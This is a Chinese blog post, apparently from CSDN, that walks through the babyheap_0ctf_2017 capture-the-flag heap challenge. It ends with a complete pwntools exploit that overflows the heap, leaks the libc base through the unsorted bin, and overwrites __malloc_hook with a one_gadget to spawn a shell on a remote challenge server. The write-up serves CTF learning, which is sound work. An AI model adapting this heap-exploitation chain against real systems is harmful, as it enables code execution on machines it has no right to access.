babyheap_0ctf_2017

最新推荐文章于 2023-03-21 07:29:32 发布
最新推荐文章于 2023-03-21 07:29:32 发布
阅读量1k 收藏
点赞数 2
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/126798233
版权

babyheap_0ctf_2017

第一道堆题目,理解不深,如有错误,请师傅们指出。类型:unsorted bin,fastbin attack

关于malloc_hook的作用:

当malloc函数调用时会检测 malloc_hook 是否为空,如果为空什么也不干,如果不为空,则跳转到 malloc_hook 记录的内存地址去执行,设置malloc_hook的地址为one_gadget,来getshell。

关于libc与main_arena等:

malloc_hook 的地址与libc基地址为固定值的偏移,所以需要泄露libc基地址。而 libc 基地址的泄露:利用当 unsorted bin 只有一个堆块时,fd、bk指针都会指向main_arena 位置,而main_arena与libc的基地址有固定值的偏移。整个泄露链子为:main_arena -> libc基地址 -> malloc_hook地址

Unsorted Bin Attack

Allocate(0x10) #0
Allocate(0x10) #1
Allocate(0x10) #2
Allocate(0x10) #3
Allocate(0x80) #4
Free(1)
Free(2)

image-20220910160812479

image-20220908230257876

payload = b'a'*0x18+p64(0x21)+b'b'*0x18+p64(0x21)+p8(0x80)
Fill(0,payload)

通过堆溢出将fastbin篡改

image-20220910160832884

image-20220908230800887

payload = b'c'*0x18+p64(0x21)
Fill(3,payload)

修改最后一个chunk的大小由0x80变为0x10

image-20220910161012658

image-20220908230955819

image-20220908231145977

Allocate(0x10)
Allocate(0x10)

此时申请两个chunk,2,4的指针指向同一个chunk

image-20220910161126371

image-20220908231906824

image-20220908232259594

payload = b'a'*0x18+p64(0x91)
Fill(3,payload)

扩大最后一个chunk,为了下面能进入unsorted bin中

image-20220908232339960

image-20220908232404026

Allocate(0x80) #5
Free(4)
Dump(2)

为了防止与top chunk进行合并,所以再次申请一个chunk,此时可以通过dump 2泄露指针

image-20220910161643753

image-20220908232600090

image-20220910170435967
然后就是对地址的处理,减去固定的偏移

unsorted_bin = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\0'))
log.info("unsorted_bin -> "+hex(unsorted_bin))
main_arena = unsorted_bin - 0x58

libc_base = main_arena-0x3c4b20  # main_arena与libc_base有固定偏移,main_arena_offset 工具
log.info("main_arena -> "+hex(main_arena))
log.info("libc_bsae -> "+hex(libc_base))

fastbin attack

现在需要去修改 __malloc_hook 的内容,那怎么去修改?现在有这一思路:我们可以利用上面的条件,操作指针2的chunk,先申请一个fastbin,通过堆溢出修改其fd,伪造一个fake fastbin,其中fake fastbin中包含__malloc__hook的地址,然后通过两次malloc就能操作fake的chunk,继而修改__malloc_hook的内容。

Allocate(0x60)
Free(4)

进入fastbin中

image-20220910171526181
通过指针2去伪造一个 fake fastbin

payload = p64(main_arena-0x33)
log.info('payload -> '+str(payload))
log.info("main_arena-0x33 -> "+hex(main_arena-0x33))
Fill(2,payload)

image-20220910171657641

那么这个fake fastbin是怎么来的,又要符合什么条件?首先符合fastbin的大小,其次在__malloc_hook地址附近

查看__malloc_hook 地址后,利用 find_fake_fast 快速找出fake fastbin的地址为 0x7f118d764aed,并且大小为0x7f,然后本地计算出与泄露的mian_arena地址偏移为0x33,便可根据题目泄露的main_arena找到这一地址。

image-20220910172546146

Allocate(0x60)  #4
Allocate(0x60)  #6
one_gadget = libc_base+0x4527a #0x4527a
log.info("one_gadget -> "+hex(one_gadget))
payload = b'a'*(0x13)+p64(one_gadget)
Fill(6,payload)

第二次申请就到了fake chunk,然后__malloc_hook与fake chunk地址差值为0x23,再减去chunk head的0x10,所以填充0x13的字符才到__malloc_hook,one_gadget一下找到so文件的shell地址即可

image-20220910173640869

Allocate(0x60)
r.interactive()

再次申请时,调用shell。

exp

from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",29122)
#r = process('./heap')  # babyheap_0ctf_2017
#r = gdb.debug("./heap")

def Allocate(size):
    r.sendlineafter("Command: ",'1')
    r.sendlineafter("Size: ",str(size))

def Fill(index,payload):
    r.sendlineafter("Command: ",'2')
    r.sendlineafter("Index: ",str(index))
    r.sendlineafter("Size: ",str(len(payload)))
    r.sendlineafter("Content: ",payload)

def Free(index):
    r.sendlineafter("Command: ",'3')
    r.sendlineafter("Index: ",str(index))

def Dump(index):
    r.sendlineafter("Command: ",'4')
    r.sendlineafter("Index: ",str(index))

#-------Unsorted Bin Attack-----
Allocate(0x10) #0
Allocate(0x10) #1
Allocate(0x10) #2
Allocate(0x10) #3
Allocate(0x80) #4
Free(1)
Free(2)


# 篡改fastbin指向
payload = b'a'*0x18+p64(0x21)+b'b'*0x18+p64(0x21)+p8(0x80)
Fill(0,payload)
# 符合fast bin大小
payload = b'c'*0x18+p64(0x21)
Fill(3,payload)
# 两次申请,2、4指向同一chunk
Allocate(0x10)
Allocate(0x10)

# 为进入unsorted bin修改大小
payload = b'a'*0x18+p64(0x91)
Fill(3,payload)
# 防止top chunk合并
Allocate(0x80)
# 进入unsorted bin
Free(4)
Dump(2)
unsorted_bin = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\0'))
log.info("unsorted_bin -> "+hex(unsorted_bin))
main_arena = unsorted_bin - 0x58
libc_base = main_arena-0x3c4b20  # main_arena与libc_base有固定偏移,main_arena_offset 工具
log.info("main_arena -> "+hex(main_arena))
log.info("libc_bsae -> "+hex(libc_base))

#---------fastbin attack-------
Allocate(0x60)
Free(4)
# 伪造fake fastbin
payload = p64(main_arena-0x33)
log.info('payload -> '+str(payload))
log.info("main_arena-0x33 -> "+hex(main_arena-0x33))
Fill(2,payload)
# 申请到fake chunk
Allocate(0x60)
Allocate(0x60)
one_gadget = libc_base+0x4526a #0x4527a
log.info("one_gadget -> "+hex(one_gadget))
payload = b'a'*(0x13)+p64(one_gadget)
# 填入__malloc_hook
Fill(6,payload)
# 调用
Allocate(0x60)
r.interactive()
Ff.cheng
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3767
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2769
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1612
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 627
babyheap
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
test_ctf_
09-30
【标题】"test_ctf_" 是一个与网络安全领域中的 Capture The Flag(CTF)比赛相关的学习资源,可能是一个练习项目或者教程。在CTF比赛中,参赛者通常需要展示他们在网络安全、编程、逆向工程、密码学等多个领域的...
0ctf Babyheap 2017
Bill
03-11 6373
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0_ctf_2017
m0_48127441的博客
04-01 197
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
2017 0ctf babyheap
Grxer的博客
03-21 124
刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上fill()也会根据我们的size进行读写,任意堆溢出,这就好办了freechunk()挺好的,该置零的都置零。
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 2633
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 209
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
0ctf_2017_babyheap
u014377094的博客
03-10 459
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
0ctf2017 babyheap
pondzhang的专栏
12-06 160
from pwn import * #p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"}) p = remote("node3.buuoj.cn",26165) elf = ELF('./0ctf_2017_babyheap') libc = ELF("./libc-2.23.so") def Allocate(size): p.recvuntil('Command: ') p.sendl.
[BUUCTF]PWN——0ctf_2017_babyheap
mcmuyanga的博客
01-11 520
0ctf_2017_babyheap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 main函数 add() edit() delete() show() 利用思路 edit存在堆溢出,可以通过重叠堆来泄露libc 然后利用fastbin attack,修改malloc_hook为one_gadget 利用过程 首先来构造重叠堆 先申请3个chunk, add(0x10)#0 add(0x10)#1 add(0x80)#2 来看一
x_ctf_b0verfl0w
最新发布
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值